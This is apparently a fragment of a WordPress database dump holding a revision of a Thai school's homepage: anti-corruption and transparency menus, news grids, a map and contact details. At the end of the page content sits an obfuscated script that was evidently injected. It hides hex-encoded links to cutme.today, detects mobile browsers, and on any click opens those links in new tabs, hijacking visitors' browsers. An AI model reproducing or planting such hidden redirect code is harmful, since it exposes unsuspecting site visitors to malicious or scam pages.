900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 11:02:19','2024-08-01 04:02:19','',14,'http://pakhaeng.ssk.in.th/?p=354',0,'revision','',0),
(355,1,'2024-08-01 11:12:21','2024-08-01 04:12:21','<!-- wp:generateblocks/container {\"uniqueId\":\"bafb5847\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":1047,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-1-1.png\" alt=\"\" class=\"wp-image-1047\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/grid1 